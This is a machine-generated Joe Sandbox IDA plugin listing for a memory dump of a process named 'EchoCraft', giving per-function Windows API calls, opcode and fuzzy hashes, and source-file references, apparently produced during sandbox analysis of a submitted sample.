Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: d17fb99ce964fce509b2c88a7969701e223195164a1c9300ca1c0aaa757fbd2a
Instruction ID: 760793a3d8bcfd34c554a5eba47cb0c2baf98b60e2eab1b735a7661282cb952f
Opcode Fuzzy Hash: d17fb99ce964fce509b2c88a7969701e223195164a1c9300ca1c0aaa757fbd2a
Instruction Fuzzy Hash: 9981D472A007069BE7249F69CD85FEBB3EDAF54364F24462EF511DA683EB70D9008B50

Function 00AB661E Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00AA86F9,00AA86F9,?,?,?,00AB686F,00000001,00000001,8BE85006), ref: 00AB6678
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00AB686F,00000001,00000001,8BE85006,?,?,?), ref: 00AB66FE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AB67F8
__freea.LIBCMT ref: 00AB6805

Part of subcall function 00AB3C40: RtlAllocateHeap.NTDLL(00000000,?,?,?,00AA0215,?,?,00AF1070,0000FFFF), ref: 00AB3C72

__freea.LIBCMT ref: 00AB680E
__freea.LIBCMT ref: 00AB6833

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 0557c2ec6fd21b0d8e57f688228210c2f7efbe6462278c08b878f4b72653d91f
Instruction ID: d50ec7e0177ce7d2769fd1e1f234decd637c781c08e921eab3c967cc6d761d3a
Opcode Fuzzy Hash: 0557c2ec6fd21b0d8e57f688228210c2f7efbe6462278c08b878f4b72653d91f
Instruction Fuzzy Hash: 6A51B372600216ABEB298FA4CD41EEB7BAEEF44750F154629FD04E7152EB38DC44CB60

Function 00B0C35B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00B0D11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0BE2E,?,?), ref: 00B0D138
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D174
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D1E2
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D218

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0C44A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0C4A5
RegCloseKey.ADVAPI32(00000000), ref: 00B0C4EA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B0C519
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B0C573
RegCloseKey.ADVAPI32(?), ref: 00B0C57F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 23f594b276a199ae04cb50ca4a82e9a9cb9e7771a8606ad7ca47d1861244d396
Instruction ID: 4f0cbd9b50d13a1d7a66ac97604b51860fa17e71f172f01f250360edf38e4bd3
Opcode Fuzzy Hash: 23f594b276a199ae04cb50ca4a82e9a9cb9e7771a8606ad7ca47d1861244d396
Instruction Fuzzy Hash: AF819F71208241AFD714DF24C995E2ABFE5FF84308F148A9CF5554B2A2DB31ED46CB92

Function 00AF990D Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00A87A0C: _wcslen.LIBCMT ref: 00A87A11

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

GetOpenFileNameW.COMDLG32(00000058), ref: 00AF9CE6
_wcslen.LIBCMT ref: 00AF9D07
_wcslen.LIBCMT ref: 00AF9D2E
GetSaveFileNameW.COMDLG32(00000058), ref: 00AF9D86

Strings

X, xrefs: 00AF9C13

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 57a23d545a551377a782711ba7e42d8574baadc48bede2bc6b2d8ec1a1d6b5d8
Instruction ID: 3e4edfad68f865901b20b5abab48e3ace367c18712a186be2f02ea5352b4d9ba
Opcode Fuzzy Hash: 57a23d545a551377a782711ba7e42d8574baadc48bede2bc6b2d8ec1a1d6b5d8
Instruction Fuzzy Hash: 0EE19F316083548FD724EF64C981B6BB7E4BF89314F14896CF9899B2A2DB31DD05CB92

Function 00AF6DA5 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AF6DF3
CoInitialize.OLE32(00000000), ref: 00AF6F50
CoCreateInstance.OLE32(00B20CBC,00000000,00000001,00B20B2C,?), ref: 00AF6F67
CoUninitialize.OLE32 ref: 00AF71EB

Strings

.lnk, xrefs: 00AF6DD1, 00AF6E3B, 00AF6EF7

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 476d61bfc54a9c715300c8257ace8e334b2c3aeb2b2cd6169599decd79037028
Instruction ID: 959e36c414ff24e84d1d135639ef879d9cec94259161717583e14c8a170f16e8
Opcode Fuzzy Hash: 476d61bfc54a9c715300c8257ace8e334b2c3aeb2b2cd6169599decd79037028
Instruction Fuzzy Hash: A0D14771608245AFC304EF64C981E6BB7E9FF88704F10496DF5958B2A2DB71ED09CB92

Function 00A81A55 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

BeginPaint.USER32(?,?,?), ref: 00A81A8A
GetWindowRect.USER32(?,?), ref: 00A81AEE
ScreenToClient.USER32(?,?), ref: 00A81B0B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A81B1C
EndPaint.USER32(?,?,?,?,?), ref: 00A81B6A
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00AC2E6F

Part of subcall function 00A81B82: BeginPath.GDI32(00000000), ref: 00A81BA0

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 9880ce9c1071457c126be33f278497b85d6b9a794999677aba8f2fe6fea894ba
Instruction ID: c5ac209942fb6b56440c6ad3528a94db8382ec89ecb0264c13d701a59865bc6f
Opcode Fuzzy Hash: 9880ce9c1071457c126be33f278497b85d6b9a794999677aba8f2fe6fea894ba
Instruction Fuzzy Hash: 6E41DE70102301AFD721EF24CC89FBA7BF8EB46321F040669F9A8972A1CB309845DB61

Function 00B187E3 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00ADFA1A,00000000,?,?,00000000,?,00AC35E0,00000004,00000000,00000000), ref: 00B18854
EnableWindow.USER32(?,00000000), ref: 00B1887A
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B188D9
ShowWindow.USER32(?,00000004), ref: 00B188ED
EnableWindow.USER32(?,00000001), ref: 00B18913
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B18937

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 06f51643220516598bd7b45c2bdb9f215c8c01a32f23c8364ddccfe1d34286b0
Instruction ID: 18347f829520747a71e20fb8e4facb31c43aa49b39a4042dd1e090d08335228b
Opcode Fuzzy Hash: 06f51643220516598bd7b45c2bdb9f215c8c01a32f23c8364ddccfe1d34286b0
Instruction Fuzzy Hash: 2441B674601240EFDB2ACF14D889BE47BE1FB46315F9851F9E5084B2B2CF31A886CB51

Function 00B02B20 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00B02B2E

Part of subcall function 00AFED1C: GetWindowRect.USER32(?,?), ref: 00AFED34

GetDesktopWindow.USER32 ref: 00B02B58
GetWindowRect.USER32(00000000), ref: 00B02B5F
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B02B91

Part of subcall function 00AEF152: Sleep.KERNEL32 ref: 00AEF1CA

GetCursorPos.USER32(?), ref: 00B02BBD
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B02C1B

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 974a93d0f91d520bd47c7934cdd74a523b03c8346585a8978684548ef359cf30
Instruction ID: f838033b9c3cb8d9ee282a0d4513c1b38ef58f1e6b59ce3c77e3af4d8c3e4df7
Opcode Fuzzy Hash: 974a93d0f91d520bd47c7934cdd74a523b03c8346585a8978684548ef359cf30
Instruction Fuzzy Hash: E9310172504309AFD720DF14C849F9BBBEAFF88304F00092AF585A7191DB70EA08CB92

Function 00AE5499 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00AE54B1
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AE54CE
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AE5506
_wcslen.LIBCMT ref: 00AE5524
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AE552C
_wcsstr.LIBVCRUNTIME ref: 00AE5536

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ca1d69e12840e1543400b55ac4ce4ea5e6fe0b3c36b373427e2045bcdc3047f6
Instruction ID: a8e27e9c59d6736af704a69ad07487e654324a4c2f63aa4f4570649ae2dbd7da
Opcode Fuzzy Hash: ca1d69e12840e1543400b55ac4ce4ea5e6fe0b3c36b373427e2045bcdc3047f6
Instruction Fuzzy Hash: D2210432A046807BEB155B3AEC09EBB7BAADF49760F108029F909CB1D1EF75DC409660

Function 00AF6135 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A850F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A85035,?,?,00AC4641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A85117

_wcslen.LIBCMT ref: 00AF6192
CoInitialize.OLE32(00000000), ref: 00AF62AC
CoCreateInstance.OLE32(00B20CBC,00000000,00000001,00B20B2C,?), ref: 00AF62C5
CoUninitialize.OLE32 ref: 00AF62E3

Strings

.lnk, xrefs: 00AF618D, 00AF61D8, 00AF629C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: f27418a1869d350a8824807f8c8b054093f4b62de481380faafc0c447e4359c4
Instruction ID: 6f1c0d02e740fe144c895b72a33bede56ca432c27b6eb9b6b2fffecd9aa1ce34
Opcode Fuzzy Hash: f27418a1869d350a8824807f8c8b054093f4b62de481380faafc0c447e4359c4
Instruction Fuzzy Hash: D0D17471A042059FC714EF64C680A6ABBF5FF89710F14889CF98A9B361C731ED45CB92

Function 00B182A9 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00B182ED
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B18312
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B1832A
GetSystemMetrics.USER32(00000004), ref: 00B18353
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00AFBFE0,00000000), ref: 00B18373

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

GetSystemMetrics.USER32(00000004), ref: 00B1835E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: f10323fe735bd17469d2567ac93a4a06d947d1ea5aff911667ae45d5a15a4777
Instruction ID: 6fe1f1cfcee5b6d3f171b713401bd13918f2999b38a90ec8e53176e4981a0818
Opcode Fuzzy Hash: f10323fe735bd17469d2567ac93a4a06d947d1ea5aff911667ae45d5a15a4777
Instruction Fuzzy Hash: 74217F71610241DFCB155F78DC48AAA37E5FB85725F684669F926C31E0DF30C890CB14

Function 00AA37A2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00AA3799,00AA3405), ref: 00AA37B0
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AA37BE
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AA37D7
SetLastError.KERNEL32(00000000,?,00AA3799,00AA3405), ref: 00AA3829

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: dcf9470c4cd398495f4eca43809153e4452ae876bead5b5cde442082b54ec132
Instruction ID: 760bb82043eb85ae7cd325a1035208f635ab870c00c136586154d20717ae9906
Opcode Fuzzy Hash: dcf9470c4cd398495f4eca43809153e4452ae876bead5b5cde442082b54ec132
Instruction Fuzzy Hash: 3B01F7777093216EAF6527B47D8566727A4FB1B7B1B30023AF120471F1EF164E025281

Function 00AB3194 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00AB2928,00B49A90,0000000C,00AA3318,00000001,?,?), ref: 00AB3198
_free.LIBCMT ref: 00AB31CB
_free.LIBCMT ref: 00AB31F3
SetLastError.KERNEL32(00000000), ref: 00AB3200
SetLastError.KERNEL32(00000000), ref: 00AB320C
_abort.LIBCMT ref: 00AB3212

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 1fecc25d52a4193047d4f17e343eaf823241a39cb053415dd39f1cbe290ed81d
Instruction ID: 5ec6d3d13decf17557fba35a3ad59a2783457dcb38a1ab428039aed040e04826
Opcode Fuzzy Hash: 1fecc25d52a4193047d4f17e343eaf823241a39cb053415dd39f1cbe290ed81d
Instruction Fuzzy Hash: 0DF0A43B644A0036DE2237387D0AFDA2A6EAFD1761F254A15F829D3293EF218A014161

Function 00B1902C Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00A81E82: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81EDC
Part of subcall function 00A81E82: SelectObject.GDI32(?,00000000), ref: 00A81EEB
Part of subcall function 00A81E82: BeginPath.GDI32(?), ref: 00A81F02
Part of subcall function 00A81E82: SelectObject.GDI32(?,00000000), ref: 00A81F2B

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B19056
LineTo.GDI32(?,00000003,00000000), ref: 00B1906A
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B19078
LineTo.GDI32(?,00000000,00000003), ref: 00B19088
EndPath.GDI32(?), ref: 00B19098
StrokePath.GDI32(?), ref: 00B190A8

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 2f36c83f4ac70fabfd9a47af2773f3ca5981f28a98a7f24264554fafdc1f34eb
Instruction ID: 2a22aa5019454e775bff67d4cad4b25073e52c3b008a51f29fad878cb32cf109
Opcode Fuzzy Hash: 2f36c83f4ac70fabfd9a47af2773f3ca5981f28a98a7f24264554fafdc1f34eb
Instruction Fuzzy Hash: 8411DB7200014DBFEF129F90DC88EEA7FADEB08354F44C065FA195A161DB72AD55DBA0

Function 00AE5A19 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AE5A34
GetDeviceCaps.GDI32(00000000,00000058), ref: 00AE5A45
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AE5A4C
ReleaseDC.USER32(00000000,00000000), ref: 00AE5A54
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AE5A6B
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00AE5A7D

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 6e15723a95f4bc0f563bac11c769ebe59ca69e2a0fa796d6d75d0cafa9169773
Instruction ID: 350c72334735cf1ea495fba169267287cc014cb7bf81405f432335a47360d760
Opcode Fuzzy Hash: 6e15723a95f4bc0f563bac11c769ebe59ca69e2a0fa796d6d75d0cafa9169773
Instruction Fuzzy Hash: CC014475E00754BBEB109FB69C49A9EBF78EB48751F148065FA08A7280DA709D00CF60

Function 00A83700 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A83731
MapVirtualKeyW.USER32(00000010,00000000), ref: 00A83739
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A83744
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A8374F
MapVirtualKeyW.USER32(00000011,00000000), ref: 00A83757
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A8375F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 387926bb5104c3fd650eb6ca0a7149f1d8836d12bdf4e2d14862555f65b7e27d
Instruction ID: 4870c98048c8c1ba6e5f30c00887a5d714c1680f580d9a8d1a8a334aaafaa7f0
Opcode Fuzzy Hash: 387926bb5104c3fd650eb6ca0a7149f1d8836d12bdf4e2d14862555f65b7e27d
Instruction Fuzzy Hash: EB0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00AEF2F7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AEF307
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AEF31D
